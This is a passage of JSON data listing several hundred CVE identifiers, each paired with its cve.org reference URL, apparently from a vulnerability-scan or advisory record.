"url": "https://www.cve.org/CVERecord?id=CVE-2025-21697"
},
{
"name": "CVE-2025-30715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30715"
},
{
"name": "CVE-2024-57973",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57973"
},
{
"name": "CVE-2022-24407",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24407"
},
{
"name": "CVE-2022-30631",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30631"
},
{
"name": "CVE-2022-46908",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-46908"
},
{
"name": "CVE-2022-3626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3626"
},
{
"name": "CVE-2024-28834",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28834"
},
{
"name": "CVE-2021-38604",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38604"
},
{
"name": "CVE-2001-1268",
"url": "https://www.cve.org/CVERecord?id=CVE-2001-1268"
},
{
"name": "CVE-2022-2874",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2874"
},
{
"name": "CVE-2025-22017",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22017"
},
{
"name": "CVE-2025-38108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38108"
},
{
"name": "CVE-2025-21783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21783"
},
{
"name": "CVE-2025-38229",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38229"
},
{
"name": "CVE-2023-46218",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46218"
},
{
"name": "CVE-2021-3733",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3733"
},
{
"name": "CVE-2025-9714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9714"
},
{
"name": "CVE-2025-21786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21786"
},
{
"name": "CVE-2024-11187",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11187"
},
{
"name": "CVE-2020-27769",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27769"
},
{
"name": "CVE-2025-30682",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30682"
},
{
"name": "CVE-2021-35586",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35586"
},
{
"name": "CVE-2014-9748",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-9748"
},
{
"name": "CVE-2025-25186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25186"
},
{
"name": "CVE-2014-8141",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-8141"
},
{
"name": "CVE-2022-1623",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1623"
},
{
"name": "CVE-2025-21881",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21881"
},
{
"name": "CVE-2025-21951",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21951"
},
{
"name": "CVE-2024-38829",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38829"
},
{
"name": "CVE-2025-10148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-10148"
},
{
"name": "CVE-2017-6831",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6831"
},
{
"name": "CVE-2024-58034",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58034"
},
{
"name": "CVE-2025-25724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25724"
},
{
"name": "CVE-2025-27818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27818"
},
{
"name": "CVE-2021-3997",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3997"
},
{
"name": "CVE-2025-50102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50102"
},
{
"name": "CVE-2023-38471",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38471"
},
{
"name": "CVE-2022-0158",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0158"
},
{
"name": "CVE-2020-27776",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27776"
},
{
"name": "CVE-2025-5222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5222"
},
{
"name": "CVE-2025-21743",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21743"
},
{
"name": "CVE-2025-38147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38147"
},
{
"name": "CVE-2023-6780",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6780"
},
{
"name": "CVE-2023-34475",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34475"
},
{
"name": "CVE-2024-26896",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26896"
},
{
"name": "CVE-2025-38286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38286"
},
{
"name": "CVE-2025-55248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55248"
},
{
"name": "CVE-2024-24762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24762"
},
{
"name": "CVE-2025-53643",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53643"
},
{
"name": "CVE-2022-0696",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0696"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2024-21144",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21144"
},
{
"name": "CVE-2024-3220",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3220"
},
{
"name": "CVE-2022-3599",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3599"
},
{
"name": "CVE-2021-39537",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39537"
},
{
"name": "CVE-2025-12380",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12380"
},
{
"name": "CVE-2022-42010",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42010"
},
{
"name": "CVE-2015-4787",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4787"
},
{
"name": "CVE-2021-35550",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35550"
},
{
"name": "CVE-2022-27781",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27781"
},
{
"name": "CVE-2025-21847",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21847"
},
{
"name": "CVE-2022-2929",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2929"
},
{
"name": "CVE-2018-15120",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-15120"
},
{
"name": "CVE-2024-58069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58069"
},
{
"name": "CVE-2025-8556",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8556"
},
{
"name": "CVE-2023-0796",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0796"
},
{
"name": "CVE-2025-21853",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21853"
},
{
"name": "CVE-2025-21871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21871"
},
{
"name": "CVE-2023-51385",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51385"
},
{
"name": "CVE-2016-0682",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0682"
},
{
"name": "CVE-2025-4287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4287"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2025-21731",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21731"
},
{
"name": "CVE-2023-48237",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48237"
},
{
"name": "CVE-2023-48706",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48706"
},
{
"name": "CVE-2021-3605",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3605"
},
{
"name": "CVE-2025-38515",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38515"
},
{
"name": "CVE-2025-22872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22872"
},
{
"name": "CVE-2024-25126",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25126"
},
{
"name": "CVE-2025-21941",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21941"
},
{
"name": "CVE-2025-8277",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8277"
},
{
"name": "CVE-2025-8941",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8941"
},
{
"name": "CVE-2017-10928",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-10928"
},
{
"name": "CVE-2023-52425",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52425"
},
{
"name": "CVE-2025-38163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38163"
},
{
"name": "CVE-2021-35567",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35567"
},
{
"name": "CVE-2017-12429",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-12429"
},
{
"name": "CVE-2025-38444",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38444"
},
{
"name": "CVE-2023-38546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38546"
},
{
"name": "CVE-2019-8322",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8322"
},
{
"name": "CVE-2024-52615",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52615"
},
{
"name": "CVE-2020-14579",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14579"
},
{
"name": "CVE-2023-2157",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2157"
},
{
"name": "CVE-2025-32386",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32386"
},
{
"name": "CVE-2025-21823",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21823"
},
{
"name": "CVE-2025-11731",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11731"
},
{
"name": "CVE-2019-1010238",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-1010238"
},
{
"name": "CVE-2024-26700",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26700"
},
{
"name": "CVE-2024-58082",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58082"
},
{
"name": "CVE-2024-35176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35176"
},
{
"name": "CVE-2024-33602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33602"
},
{
"name": "CVE-2025-55551",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55551"
},
{
"name": "CVE-2025-50100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50100"
},
{
"name": "CVE-2023-29404",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29404"
},
{
"name": "CVE-2025-21763",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21763"
},
{
"name": "CVE-2023-21954",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21954"
},
{
"name": "CVE-2025-40780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40780"
},
{
"name": "CVE-2023-48368",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48368"
},
{
"name": "CVE-2014-4715",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-4715"
},
{
"name": "CVE-2022-4304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4304"
},
{
"name": "CVE-2023-21939",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21939"
},
{
"name": "CVE-2022-48554",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48554"
},
{
"name": "CVE-2022-0563",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0563"
},
{
"name": "CVE-2025-38157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38157"
},
{
"name": "CVE-2023-24757",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24757"
},
{
"name": "CVE-2024-20926",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20926"
},
{
"name": "CVE-2025-21678",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21678"
},
{
"name": "CVE-2025-4056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4056"
},
{
"name": "CVE-2024-28757",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28757"
},
{
"name": "CVE-2020-29562",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29562"
},
{
"name": "CVE-2022-31683",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-31683"
},
{
"name": "CVE-2020-22218",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-22218"
},
{
"name": "CVE-2025-0913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0913"
},
{
"name": "CVE-2025-53062",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53062"
},
{
"name": "CVE-2015-4776",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4776"
},
{
"name": "CVE-2025-21872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21872"
},
{
"name": "CVE-2017-3616",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3616"
},
{
"name": "CVE-2021-2163",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2163"
},
{
"name": "CVE-2025-21922",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21922"
},
{
"name": "CVE-2025-27817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27817"
},
{
"name": "CVE-2023-30086",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30086"
},
{
"name": "CVE-2017-6832",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6832"
},
{
"name": "CVE-2022-2208",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2208"
},
{
"name": "CVE-2024-45720",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45720"
},
{
"name": "CVE-2022-1056",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1056"
},
{
"name": "CVE-2018-10805",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-10805"
},
{
"name": "CVE-2019-19906",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-19906"
},
{
"name": "CVE-2025-38219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38219"
},
{
"name": "CVE-2015-4785",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4785"
},
{
"name": "CVE-2025-38466",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38466"
},
{
"name": "CVE-2022-24921",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24921"
},
{
"name": "CVE-2022-32208",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32208"
},
{
"name": "CVE-2020-15095",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15095"
},
{
"name": "CVE-2018-16328",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-16328"
},
{
"name": "CVE-2024-38949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38949"
},
{
"name": "CVE-2022-28327",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28327"
},
{
"name": "CVE-2025-5745",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5745"
},
{
"name": "CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"name": "CVE-2022-43239",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43239"
},
{
"name": "CVE-2022-41409",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41409"
},
{
"name": "CVE-2022-32546",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32546"
},
{
"name": "CVE-2025-0838",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0838"
},
{
"name": "CVE-2024-57980",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57980"
},
{
"name": "CVE-2023-5441",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5441"
},
{
"name": "CVE-2025-55553",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55553"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2024-58011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58011"
},
{
"name": "CVE-2025-21796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21796"
},
{
"name": "CVE-2024-12086",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12086"
},
{
"name": "CVE-2025-27219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27219"
},
{
"name": "CVE-2025-21691",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21691"
},
{
"name": "CVE-2021-4219",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4219"
},
{
"name": "CVE-2018-15798",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-15798"
},
{
"name": "CVE-2025-55154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55154"
},
{
"name": "CVE-2025-49146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49146"
},
{
"name": "CVE-2025-40026",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40026"
},
{
"name": "CVE-2022-1292",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1292"
},
{
"name": "CVE-2022-3153",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3153"
},
{
"name": "CVE-2022-2057",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2057"
},
{
"name": "CVE-2025-5197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5197"
},
{
"name": "CVE-2023-45283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45283"
},
{
"name": "CVE-2023-39328",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39328"
},
{
"name": "CVE-2023-45853",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45853"
},
{
"name": "CVE-2024-47611",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47611"
},
{
"name": "CVE-2017-11447",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-11447"
},
{
"name": "CVE-2019-8323",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8323"
},
{
"name": "CVE-2023-39593",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39593"
},
{
"name": "CVE-2025-45582",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-45582"
},
{
"name": "CVE-2025-46569",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46569"
},
{
"name": "CVE-2024-21068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21068"
},
{
"name": "CVE-2018-14434",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14434"
},
{
"name": "CVE-2019-6293",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-6293"
},
{
"name": "CVE-2025-30703",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30703"
},
{
"name": "CVE-2025-21738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21738"
},
{
"name": "CVE-2022-48522",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48522"
},
{
"name": "CVE-2025-21684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21684"
},
{
"name": "CVE-2023-50868",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50868"
},
{
"name": "CVE-2023-45288",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45288"
},
{
"name": "CVE-2023-21830",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21830"
},
{
"name": "CVE-2023-26965",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26965"
},
{
"name": "CVE-2023-2602",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2602"
},
{
"name": "CVE-2021-2161",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2161"
},
{
"name": "CVE-2025-6069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6069"
},
{
"name": "CVE-2023-3817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3817"
},
{
"name": "CVE-2017-10140",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-10140"
},
{
"name": "CVE-2021-2341",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2341"
},
{
"name": "CVE-2021-3468",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3468"
},
{
"name": "CVE-2024-6232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
},
{
"name": "CVE-2024-58061",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58061"
},
{
"name": "CVE-2025-46148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46148"
},
{
"name": "CVE-2024-58058",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58058"
},
{
"name": "CVE-2025-21768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21768"
},
{
"name": "CVE-2025-21864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21864"
},
{
"name": "CVE-2025-2149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2149"
},
{
"name": "CVE-2021-3502",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3502"
},
{
"name": "CVE-2025-6052",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6052"
},
{
"name": "CVE-2018-16329",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-16329"
},
{
"name": "CVE-2022-41725",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41725"
},
{
"name": "CVE-2025-24813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24813"
},
{
"name": "CVE-2024-58056",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58056"
},
{
"name": "CVE-2023-52426",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52426"
},
{
"name": "CVE-2025-50080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50080"
},
{
"name": "CVE-2025-21725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21725"
},
{
"name": "CVE-2024-43790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43790"
},
{
"name": "CVE-2025-38313",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38313"
},
{
"name": "CVE-2025-38336",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38336"
},
{
"name": "CVE-2022-2058",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2058"
},
{
"name": "CVE-2025-22009",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22009"
},
{
"name": "CVE-2025-38061",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38061"
},
{
"name": "CVE-2022-45061",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45061"
},
{
"name": "CVE-2025-21727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21727"
},
{
"name": "CVE-2024-45492",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45492"
},
{
"name": "CVE-2015-4764",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4764"
},
{
"name": "CVE-2025-22228",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22228"
},
{
"name": "CVE-2022-43240",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43240"
},
{
"name": "CVE-2020-1752",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-1752"
},
{
"name": "CVE-2025-5987",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5987"
},
{
"name": "CVE-2023-4091",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4091"
},
{
"name": "CVE-2022-30635",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30635"
},
{
"name": "CVE-2025-38375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38375"
},
{
"name": "CVE-2015-4779",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4779"
},
{
"name": "CVE-2021-20312",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20312"
},
{
"name": "CVE-2025-4330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4330"
},
{
"name": "CVE-2025-2953",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2953"
},
{
"name": "CVE-2020-14593",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14593"
},
{
"name": "CVE-2025-21904",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21904"
},
{
"name": "CVE-2019-20838",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20838"
},
{
"name": "CVE-2025-37798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37798"
},
{
"name": "CVE-2022-41715",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41715"
},
{
"name": "CVE-2025-50078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50078"
},
{
"name": "CVE-2022-28739",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28739"
},
{
"name": "CVE-2024-26726",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26726"
},
{
"name": "CVE-2023-52593",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52593"
},
{
"name": "CVE-2025-3933",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3933"
},
{
"name": "CVE-2023-26785",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26785"
},
{
"name": "CVE-2025-49794",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49794"
},
{
"name": "CVE-2020-14664",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14664"
},
{
"name": "CVE-2023-48235",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48235"
},
{
"name": "CVE-2024-57970",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57970"
},
{
"name": "CVE-2024-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9287"
},
{
"name": "CVE-2025-21668",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21668"
},
{
"name": "CVE-2025-22004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22004"
},
{
"name": "CVE-2022-32207",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32207"
},
{
"name": "CVE-2024-44939",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44939"
},
{
"name": "CVE-2024-43374",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43374"
},
{
"name": "CVE-2023-50782",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50782"
},
{
"name": "CVE-2025-21929",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21929"
},
{
"name": "CVE-2025-4138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4138"
},
{
"name": "CVE-2022-41722",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41722"
},
{
"name": "CVE-2022-3627",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3627"
},
{
"name": "CVE-2020-14797",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14797"
},
{
"name": "CVE-2025-21735",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21735"
},
{
"name": "CVE-2024-3596",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3596"
},
{
"name": "CVE-2023-0215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0215"
},
{
"name": "CVE-2024-27280",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27280"
},
{
"name": "CVE-2025-3000",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3000"
},
{
"name": "CVE-2022-3213",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3213"
},
{
"name": "CVE-2022-2867",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2867"
},
{
"name": "CVE-2023-36632",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36632"
},
{
"name": "CVE-2021-23177",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23177"
},
{
"name": "CVE-2020-14798",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14798"
},
{
"name": "CVE-2007-4559",
"url": "https://www.cve.org/CVERecord?id=CVE-2007-4559"
},
{
"name": "CVE-2025-21839",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21839"
},
{
"name": "CVE-2025-38112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38112"
},
{
"name": "CVE-2025-5878",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5878"
},
{
"name": "CVE-2023-0286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0286"
},
{
"name": "CVE-2022-3715",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3715"
},
{
"name": "CVE-2023-4016",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4016"
},
{
"name": "CVE-2024-58063",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58063"
},
{
"name": "CVE-2015-4780",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4780"
},
{
"name": "CVE-2024-41957",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41957"
},
{
"name": "CVE-2025-38500",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38500"
},
{
"name": "CVE-2024-56171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56171"
},
{
"name": "CVE-2025-24293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24293"
},
{
"name": "CVE-2025-8961",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8961"
},
{
"name": "CVE-2025-21977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21977"
},
{
"name": "CVE-2022-25147",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25147"
},
{
"name": "CVE-2025-21779",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21779"
},
{
"name": "CVE-2024-58005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58005"
},
{
"name": "CVE-2025-21674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21674"
},
{
"name": "CVE-2022-3598",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3598"
},
{
"name": "CVE-2025-30696",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30696"
},
{
"name": "CVE-2023-0798",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0798"
},
{
"name": "CVE-2025-21918",
